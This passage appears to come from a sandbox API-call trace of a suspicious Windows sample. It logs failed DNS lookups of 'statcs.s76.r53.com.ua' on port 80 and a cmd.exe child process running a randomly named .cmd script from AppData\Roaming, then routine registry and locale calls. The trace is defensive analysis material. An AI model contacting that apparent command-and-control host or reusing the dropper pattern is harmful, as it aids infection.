dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13e8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.890] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1421ffc, cbMultiByte=27, lpWideCharStr=0x152ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0108.890] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13da714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0108.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0108.891] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13e867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0108.891] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x152fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x152fbac | out: ppResult=0x152fbac*=0x0) returned 11001 [0108.992] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x152fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x152fbac | out: ppResult=0x152fbac*=0x0) returned 11001 [0108.994] getnameinfo (in: pSockaddr=0x152fc14, SockaddrLength=0x0, pNodeBuffer=0x134494c, NodeBufferSize=0x401, pServiceBuffer=0x1405124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0108.994] htons (hostshort=0x0) returned 0x0 [0108.994] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0108.994] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] SetEvent (hEvent=0x84) returned 1 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] GetCurrentThreadId () returned 0xcd4 [0108.994] CloseHandle (hObject=0xb8) returned 1 [0108.994] RtlExitUserThread (Status=0x0) Thread: id = 57 os_tid = 0xce4 Process: id = "35" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xccc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0xcb4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5327 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5328 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5329 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5330 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5331 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 5332 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5333 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5334 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5335 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5336 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5487 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5488 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5489 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5490 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 5491 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5492 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 5493 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5494 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5495 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5496 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5497 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5498 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5499 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5500 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5501 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 5502 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5503 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5504 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5505 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5506 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5507 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5508 start_va = 0x300000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 5509 start_va = 0x510000 end_va = 0x672fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 5510 start_va = 0x710000 end_va = 0x130ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 5552 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5553 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5554 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5555 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5556 start_va = 0x1310000 end_va = 0x15defff entry_point = 0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 55 os_tid = 0xcd0 [0109.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fc5c | out: lpSystemTimeAsFileTime=0x22fc5c*(dwLowDateTime=0x7f0a2140, dwHighDateTime=0x1d440a9)) [0109.109] GetCurrentProcessId () returned 0xccc [0109.109] GetCurrentThreadId () returned 0xcd0 [0109.109] GetTickCount () returned 0x261ce [0109.109] QueryPerformanceCounter (in: lpPerformanceCount=0x22fc54 | out: lpPerformanceCount=0x22fc54*=16589967147) returned 1 [0109.113] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0109.113] __set_app_type (_Type=0x1) [0109.113] __p__fmode () returned 0x76b331f4 [0109.113] __p__commode () returned 0x76b331fc [0109.113] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0109.113] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0109.114] GetCurrentThreadId () returned 0xcd0 [0109.114] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcd0) returned 0x38 [0109.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.114] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0109.114] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.114] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fbec | out: phkResult=0x22fbec*=0x0) returned 0x2 [0109.114] VirtualQuery (in: lpAddress=0x22fc23, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.114] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fbbc, dwLength=0x1c | out: lpBuffer=0x22fbbc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0109.114] GetConsoleOutputCP () returned 0x1b5 [0109.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.115] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0109.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.115] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0109.115] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.115] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0109.116] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.116] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0109.116] GetEnvironmentStringsW () returned 0x420150* [0109.116] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.116] GetEnvironmentStringsW () returned 0x420150* [0109.116] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb5c | out: phkResult=0x22eb5c*=0x40) returned 0x0 [0109.116] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.116] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.116] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegCloseKey (hKey=0x40) returned 0x0 [0109.117] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22eb5c | out: phkResult=0x22eb5c*=0x40) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x40, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x1, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x0, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x4, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x4) returned 0x0 [0109.117] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22eb64, lpData=0x22eb68, lpcbData=0x22eb60*=0x1000 | out: lpType=0x22eb64*=0x0, lpData=0x22eb68*=0x9, lpcbData=0x22eb60*=0x1000) returned 0x2 [0109.117] RegCloseKey (hKey=0x40) returned 0x0 [0109.117] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886356 [0109.117] srand (_Seed=0x5b886356) [0109.117] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" [0109.117] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd\"" [0109.117] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.118] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4219b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0109.118] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.118] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.118] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.118] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.118] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.118] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.118] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.118] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.118] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.118] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.118] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.118] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.118] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f928, lpFilePart=0x22f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f924*="Desktop") returned 0x18 [0109.118] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.119] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0109.119] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0109.119] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f6a4 | out: lpFindFileData=0x22f6a4) returned 0x41ffe0 [0109.119] FindClose (in: hFindFile=0x41ffe0 | out: hFindFile=0x41ffe0) returned 1 [0109.119] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.119] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0109.119] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0109.119] GetEnvironmentStringsW () returned 0x420150* [0109.120] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0109.120] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.122] GetConsoleOutputCP () returned 0x1b5 [0109.122] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.122] GetUserDefaultLCID () returned 0x409 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fa68, cchData=128 | out: lpLCData="0") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fa68, cchData=128 | out: lpLCData="0") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fa68, cchData=128 | out: lpLCData="1") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0109.123] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0109.123] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.124] GetConsoleTitleW (in: lpConsoleTitle=0x4201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.124] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0109.125] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0109.129] _wcsicmp 